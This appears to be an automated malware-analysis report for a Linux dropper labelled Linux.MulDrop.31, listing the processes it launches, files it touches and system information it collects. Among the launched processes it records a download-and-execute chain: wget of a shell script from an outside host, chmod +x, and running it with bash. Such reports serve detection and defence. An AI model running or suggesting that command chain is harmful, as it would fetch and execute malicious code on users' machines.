Linux.MulDrop.31

Malicious functions:

Performs process tracing:

Launches processes:

/bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
<SAMPLE_FULL_PATH>
/bin/bash <SAMPLE_FULL_PATH> -c
wget https://www.pubgradar.cn/shell/1851515149/pubgss.sh
chmod +x pubgss.sh
./pubgss.sh
tee pubgss.log
bash ./pubgss.sh
grep -Eqi debian
cat /etc/issue
clear
expr 6666 + 1
stty -g
stty -echo
stty cbreak
dd if=/dev/tty bs=1 count=1
stty -raw
stty echo
stty
apt-get -y update
/usr/bin/dpkg --print-foreign-architectures
/usr/lib/apt/methods/http
/usr/lib/apt/methods/gpgv
/usr/bin/gpgv #3 ##/etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg /tmp/apt.sig.9i96ni /tmp/apt.data.eAYBBk
/usr/lib/apt/methods/bzip2
/usr/bin/gpgv #3 ##/etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg /tmp/apt.sig.Ad4g4u /tmp/apt.data.cWXGCF

Kills the following processes:

Performs operations with the file system:

Modifies file access rights:

/root/pubgss.sh
/var/lib/apt/lists/security.debian.org_dists_jessie_updates_InRelease
/var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_source_Sources.bz2.decomp.l4V0iZ
/var/lib/apt/lists/security.debian.org_dists_jessie_updates_main_source_Sources
/var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_binary-amd64_Packages.bz2.decomp.cVgubm

Creates or modifies files:

/root/pubgss.sh
/root/pubgss.log
/var/lib/apt/lists/lock
/var/lib/apt/lists/security.debian.org_dists_jessie_updates_InRelease
/var/lib/apt/lists/ftp.ru.debian.org_debian_dists_jessie-updates_InRelease
/var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_InRelease
/var/lib/apt/lists/ftp.ru.debian.org_debian_dists_jessie_Release.gpg
/tmp/apt.sig.9i96ni
/tmp/apt.data.eAYBBk
/var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie-updates_InRelease
/var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release.gpg
/tmp/fileutl.message.6OKN6c
/tmp/fileutl.message.6OKN6c (deleted)
/var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release
/tmp/apt.sig.Ad4g4u
/tmp/apt.data.cWXGCF
/var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_source_Sources.bz2
/var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_source_Sources.bz2.decomp.l4V0iZ
/var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_binary-amd64_Packages.bz2
/var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_i18n_Translation-en.bz2
/var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_source_Sources.bz2.decomp
/var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_binary-amd64_Packages.bz2.decomp.cVgubm
/tmp/fileutl.message.Qmt4yA
/tmp/fileutl.message.Qmt4yA (deleted)

Deletes files:

/var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release.gpg
/tmp/apt.sig.9i96ni
/tmp/apt.data.eAYBBk
/tmp/fileutl.message.6OKN6c
/var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_source_Sources
/tmp/apt.sig.Ad4g4u
/tmp/apt.data.cWXGCF
/tmp/fileutl.message.Qmt4yA

Network activity:

Establishes connection:

HTTP GET requests:

DNS ASK:

Sends data to the following servers:

Receives data from the following servers:

Other:

Collects OS information

Collects RAM information